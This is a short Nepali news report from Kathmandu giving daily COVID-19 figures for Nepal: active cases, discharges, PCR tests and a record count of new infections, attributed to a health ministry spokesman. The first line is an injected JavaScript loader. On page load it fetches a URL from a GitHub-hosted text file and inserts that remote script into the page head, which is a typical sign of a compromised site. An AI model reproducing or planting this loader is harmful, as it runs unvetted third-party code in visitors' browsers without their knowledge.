;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ १४,
काठमाडौं । नेपालमा आइतबारसम्ममा १७ हजार ५ सय १८ जना मानिसहरु संक्रिय कोरोना संक्रमित भएको स्वास्थ्य तथा जनसंख्या मन्त्रालयका प्रवक्ता डा. जागेश्वार गौतमले जानकारी दिए ।
त्यस्तै २४ घण्टामा २ सय ६७ जना विभिन्न अस्पतालबाट डिस्चार्ज भएका छन्। योसंगै कूल डिस्चार्ज हुनेको संख्या २० हजार ८ सय २२ पुगेको छ । आज १२ हजार ६ सय १७ जनाको पीसिआर परीक्षण गर्दा आज सम्मकै उच्च संक्रमितहरु थपिएका छन् । जसमा १ हजार २ सय २१ जना थपिएका छन् । जसमा ३४८ जना महिला र ८७३ जना पुरुष रहेका छन् ।
फेसबुक प्रतिक्रियाहरु